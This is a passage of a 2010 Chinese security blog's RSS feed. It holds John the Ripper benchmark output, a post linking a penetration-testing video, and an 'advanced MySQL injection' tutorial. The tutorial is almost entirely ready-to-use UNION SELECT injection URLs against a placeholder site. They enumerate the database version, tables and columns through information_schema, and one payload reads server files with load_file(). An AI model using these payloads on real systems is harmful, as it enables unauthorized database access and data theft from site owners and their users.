/&gt;&lt;strong&gt;&lt;em&gt;E:\nix\john-1.7.5\run&lt;/em&gt;&lt;/strong&gt;&lt;em&gt;&amp;gt;john --test --format=phpass-md5&lt;br /&gt;Benchmarking: PHPass MD5 [phpass-md5]... Using phpass mode, by linking to md5_gen(17) functions DONE&lt;br /&gt;&lt;/em&gt;&lt;strong&gt;&lt;em&gt;Many salts:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1241 c/s&lt;br /&gt;Only one salt:&amp;nbsp; 1250 c/s&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;E:\nix\john-1.7.6\run&lt;/em&gt;&lt;/strong&gt;&lt;em&gt;&amp;gt;john --test --format=phpass-md5&lt;br /&gt;Benchmarking: PHPass MD5 SSE2 [phpass-MD5 SSE2]... Using phpass mode, by linking to md5_gen(17) functions DONE&lt;br /&gt;&lt;/em&gt;&lt;strong&gt;&lt;em&gt;Many salts:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3008 c/s&lt;br /&gt;Only one salt:&amp;nbsp; 3002 c/s&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/John-the-Ripper-hydra-new-versions.html&quot; target=&quot;_blank&quot;&gt;继续阅读《[update]John the Ripper &amp; hydra》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Download.html&quot;&gt;Download&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=john&quot;&gt;john&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=john+the+ripper&quot;&gt;john the ripper&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=hydra&quot;&gt;hydra&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/John-the-Ripper-hydra-new-versions.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(3)&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/John-the-Ripper-hydra-new-versions.html#comment&quot; target=&quot;_blank&quot;&gt;还没有相关文章，您来说两句？&lt;/a&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683336/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683336/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683336/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683336/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Download</category><pubDate>Tue, 15 Jun 2010 02:54:50 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/John-the-Ripper-hydra-new-versions.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/John-the-Ripper-hydra-new-versions.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/John-the-Ripper-hydra-new-versions.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683336/5281982</fs:itemid></item><item><title>MYSQL高级注入实例</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683337/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=510</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=510&amp;key=12552599</trackback:ping><description>&lt;p&gt;&lt;strong&gt;感谢&lt;a target=&quot;_blank&quot; href=&quot;http://www.xnquan.com/blog/art/&quot;&gt;xnquan&lt;/a&gt;的投递&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;###########################################&lt;br /&gt;#MYSQL高级注入实例&lt;br /&gt;###########################################&lt;br /&gt;&lt;br /&gt;-----------------------------------系统信息 -------------------------------------------&lt;br /&gt;http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5&lt;br /&gt;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&lt;br /&gt;&lt;br /&gt;http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,database(),4,5&lt;br /&gt;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&lt;br /&gt;&lt;br /&gt;http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,user(),4,5&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------爆数据库的表 -------------------------------------------------&lt;br /&gt;http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 0,1) t order by table_schema desc)t limit 1--&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; /0x61797363是爆出的数据库aysc（database()）的16进制 爆出位置0的表 注意从0开始&lt;br /&gt;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 2,1) t order by table_schema desc)t limit 1--&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; /爆出位置2的表&lt;br /&gt;&lt;br /&gt;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&lt;br /&gt;&lt;br /&gt;http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 10,1) t order by table_schema desc)t limit 1--&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; /爆出位置10的表&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&lt;br /&gt;&lt;br /&gt;-------------------------------爆出字段 -------------------------------------------------------------&lt;br /&gt;http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(cast(count(*) as char)),0,0 from information_schema.columns&amp;nbsp;&amp;nbsp; where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 limit 1--&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; /0x6364625f696d6167657479706573是选择一个表 0x61797363是数据库账户 16进制&amp;nbsp; &lt;br /&gt;//爆出含有多少字段&lt;br /&gt;&lt;br /&gt;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 0,1) t order by 1 desc)t limit 1--&lt;br /&gt;//爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 0 位置 的字段 （必须转换16进制）&lt;br /&gt;&lt;br /&gt;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&lt;br /&gt;&lt;br /&gt;http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 1,1) t order by 1 desc)t limit 1--&lt;br /&gt;&lt;br /&gt;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&lt;br /&gt;&lt;br /&gt;//爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 1 位置 的字段 （必须转换16进制）&lt;br /&gt;&lt;br /&gt;-----------------------------爆出数据数据 ----------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;联合查询&lt;br /&gt;这个不说了&lt;br /&gt;&lt;br /&gt;-----------------------------跨库？得到数据库账户？--------------&lt;br /&gt;参考我的教程 php注入爆数据库账户&lt;br /&gt;http://u.115.com/file/f86e56c2cb&lt;br /&gt;&lt;br /&gt;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&amp;times;&lt;br /&gt;&lt;br /&gt;-----------------------------读数据文件--------------&lt;br /&gt;/renwu.php?id=10 and 1=2 union select 0,0,concat(load_file(16进制的地址)),0,0 --&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Reference:&lt;br /&gt;[1]http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Advanced-SQL-Injection-In-MYSQL-Applications.html&quot; target=&quot;_blank&quot;&gt;继续阅读《MYSQL高级注入实例》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Dbapp.html&quot;&gt;Dbapp&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=sql+injection&quot;&gt;sql injection&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=MYSQL&quot;&gt;MYSQL&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=xnquan&quot;&gt;xnquan&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Advanced-SQL-Injection-In-MYSQL-Applications.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(1)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/sfx-sqli-version-11322.html&quot;&gt;SFX-SQLi version 1.1.3.22&lt;/a&gt; (2010-4-6 21:47:39)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Exploiting-hard-filtered-SQL-Injections.html&quot;&gt;Exploiting hard filtered SQL Injections&lt;/a&gt; (2010-3-19 23:16:44)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/webraider.html&quot;&gt;webraider&lt;/a&gt; (2010-2-27 19:43:34)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Dirty-Tricks.html&quot;&gt;Dirty Tricks&lt;/a&gt; (2010-1-25 16:25:54)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/qingtiandy-Sql-Injection-Vulnerability-0day.html&quot;&gt;睛天电影系统注入漏洞&lt;/a&gt; (2010-1-25 1:47:1)  &lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683337/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683337/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683337/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683337/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Dbapp</category><pubDate>Mon, 14 Jun 2010 03:16:16 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Advanced-SQL-Injection-In-MYSQL-Applications.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Advanced-SQL-Injection-In-MYSQL-Applications.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Advanced-SQL-Injection-In-MYSQL-Applications.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683337/5281982</fs:itemid></item><item><title>Penetration Testing In The Real World</title><link>http://item.feedsky.com/~feedsky/pcsec/~8218154/408683338/5281982/1/item.html</link><wfw:comment>http://www.pcsec.org/</wfw:comment><wfw:commentRss>http://www.pcsec.org/feed.asp?cmt=507</wfw:commentRss><trackback:ping>http://www.pcsec.org/cmd.asp?act=tb&amp;id=507&amp;key=11c8e0cf</trackback:ping><description>&lt;p&gt;&lt;strong&gt;#Trace:&lt;a target=&quot;_blank&quot; href=&quot;http://www.offensive-security.com/backtrack/penetration-testing-in-the-real-world/&quot;&gt;Offensive Security&lt;/a&gt; 的教程&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Penetration Testing in the real world. If you are tired of &amp;ldquo;Hacking with Netcat&amp;rdquo; webcasts or &amp;ldquo;Penetration Testing with RPC DCOM&amp;rdquo;, then this movie is for you. It&amp;rsquo;s a quick reconstruction of a Penetration test we preformed over a year ago, replicated in our labs. We hope you enjoy it! Check it out here :&lt;/p&gt;&lt;object height=&quot;300&quot; width=&quot;400&quot;&gt;&lt;param value=&quot;true&quot; name=&quot;allowfullscreen&quot; /&gt;&lt;param value=&quot;always&quot; name=&quot;allowscriptaccess&quot; /&gt;&lt;param value=&quot;http://vimeo.com/moogaloop.swf?clip_id=11213607&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1&quot; name=&quot;movie&quot; /&gt;&lt;embed height=&quot;300&quot; width=&quot;400&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; type=&quot;application/x-shockwave-flash&quot; src=&quot;http://vimeo.com/moogaloop.swf?clip_id=11213607&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;p&gt;&lt;a href=&quot;http://vimeo.com/11213607&quot;&gt;Penetration Testing in the Real World&lt;/a&gt; from &lt;a href=&quot;http://vimeo.com/user3671545&quot;&gt;Offensive Security&lt;/a&gt; on &lt;a href=&quot;http://vimeo.com&quot;&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Copyright © 2008&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Penetration-Testing-In-The-Real-World.html&quot; target=&quot;_blank&quot;&gt;继续阅读《Penetration Testing In The Real World》的全文内容...&lt;/a&gt;&lt;/p&gt;&lt;p&gt;分类: &lt;a href=&quot;http://www.pcsec.org/archives/Pentest.html&quot;&gt;Penetration Testing&lt;/a&gt; | Tags: &lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=Penetration+Testing&quot;&gt;Penetration Testing&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.pcsec.org/catalog.asp?tags=pentest&quot;&gt;pentest&lt;/a&gt;&amp;nbsp;&amp;nbsp; | &lt;a href=&quot;http://www.pcsec.org/archives/Penetration-Testing-In-The-Real-World.html#comment&quot; target=&quot;_blank&quot;&gt;添加评论&lt;/a&gt;(0)&lt;/p&gt;&lt;h3&gt;相关文章:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Penetration-Testing-Framework-v057-released.html&quot;&gt;Penetration Testing Framework v0.57 released&lt;/a&gt; (2009-12-31 19:24:0)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/The-Art-of-Grey-Box-Attack.html&quot;&gt;The Art of Grey-Box Attack&lt;/a&gt; (2009-7-11 19:16:22)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Remote-CMD-With-WMI.html&quot;&gt;Remote CMD With WMI[2009-6-26 更新，请下载新版本覆盖。]&lt;/a&gt; (2009-6-25 18:11:42)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/plurktwittermyspace911.html&quot;&gt;Plurk蠕蟲、Twitter蠕蟲、MySpace蠕蟲與911於管理面之啟示：滲透測試的新觀念，讓軟體重生吧！&lt;/a&gt; (2009-5-11 13:51:34)  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.pcsec.org/archives/Metasploit3-Postgres-On-Windows.html&quot;&gt;Metasploit3 Postgres On Windows&lt;/a&gt; (2009-3-26 17:28:46)  &lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/408683338/pcsec/feedsky/s.gif?r=http://item.feedsky.com/~feedsky/pcsec/~8218154/408683338/5281982/1/item.html&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/pcsec/408683338/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/pcsec/408683338/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Penetration Testing</category><pubDate>Fri, 30 Apr 2010 01:17:15 +0800</pubDate><author>root@pcsec.org (Trace)</author><comments>http://www.pcsec.org/archives/Penetration-Testing-In-The-Real-World.html#comment</comments><guid isPermaLink="false">http://www.pcsec.org/archives/Penetration-Testing-In-The-Real-World.html</guid><dc:creator>root@pcsec.org (Trace)</dc:creator><fs:srclink>http://www.pcsec.org/archives/Penetration-Testing-In-The-Real-World.html</fs:srclink><fs:srcfeed>http://pcsec.org/rss.xml</fs:srcfeed><fs:itemid>feedsky/pcsec/~8218154/408683338/5281982</fs:itemid></item></channel></rss>